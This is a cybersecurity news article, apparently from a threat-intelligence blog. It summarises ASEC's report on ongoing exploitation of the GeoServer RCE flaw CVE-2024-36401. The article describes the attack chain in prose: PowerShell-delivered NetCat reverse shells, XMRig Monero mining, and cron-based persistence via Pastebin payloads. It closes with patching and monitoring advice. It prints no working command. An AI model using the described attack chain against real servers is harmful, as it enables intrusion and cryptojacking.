Ongoing Attacks Exploit GeoServer RCE Flaw (CVE-2024-36401) to Install NetCat and XMRig CoinMiner
Do Son 
The AhnLab Security Intelligence Center (ASEC) has issued a fresh warning on the ongoing exploitation of a remote code execution (RCE) vulnerability in GeoServer, tracked as CVE-2024-36401. According to ASEC, this flaw continues to be abused in active campaigns targeting both Windows and Linux environments, with attackers deploying NetCat reverse shells and XMRig CoinMiners to hijack system resources and maintain control over compromised servers.
“ASEC has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner,” the report states.
GeoServer is a widely used open-source Geographic Information System (GIS) server written in Java. It allows users to share and process spatial data across the web. But this powerful utility became a prime target when researchers disclosed a serious RCE vulnerability (CVE-2024-36401) that enables unauthorized remote code execution.
Since its disclosure, multiple cyber threat actors have integrated the GeoServer vulnerability into their toolkits. Fortinet had previously reported that malware families such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner were being dropped using this exploit. Trend Micro also noted spear-phishing campaigns by the Earth Baxia group targeting Taiwanese government agencies using the same flaw.
ASEC detailed one particular campaign in South Korea, where unpatched versions of GeoServer were compromised in Windows environments. Attackers initiated their campaign by executing PowerShell commands that downloaded malicious scripts to deploy NetCat and XMRig.
The infection begins with a script named adminc.ps1, which installs NetCat. While NetCat is a legitimate network utility, threat actors weaponize it to create reverse shells, allowing them to issue remote commands as if they were sitting at the console of the infected machine.
“The NetCat executed via the ‘-e’ argument connects to the C&C server and operates as a reverse shell, allowing the threat actor to control the infected system,” ASEC noted.
Next, attackers deploy XMRig, an open-source Monero mining tool. The malicious PowerShell command fetches the payload from an external site using:
This script installs XMRig and configures it to mine Monero using the compromised system’s CPU cycles.
In Linux environments, attackers use bash scripts that terminate rival mining processes, execute startup.sh, and add malicious entries to the system’s cron scheduler for persistence. These cron jobs point to payloads hosted on Pastebin, keeping the infection alive across reboots.
Organizations using GeoServer are urged to:
- Update to the latest patched version immediately
- Audit systems for suspicious PowerShell or bash activity
- Check for unusual CPU usage patterns
- Monitor outbound traffic for connections to mining pools or C&C servers
Related Posts:
- Patch Now! Ladon, AnyDesk, and More Lurk in Unpatched ActiveMQ Servers
- Stealthy Crypto-Mining Malware Hijacking PCs via USB Drives
- CVE-2024-36401 (CVSS 9.8): Critical GeoServer Flaw Under Active Attack, PoC Available
- CVE-2024-36401 (CVSS 9.8): Urgent Patch Needed for GeoServer RCE Vulnerability
- Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 to Launch Malware Campaigns
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
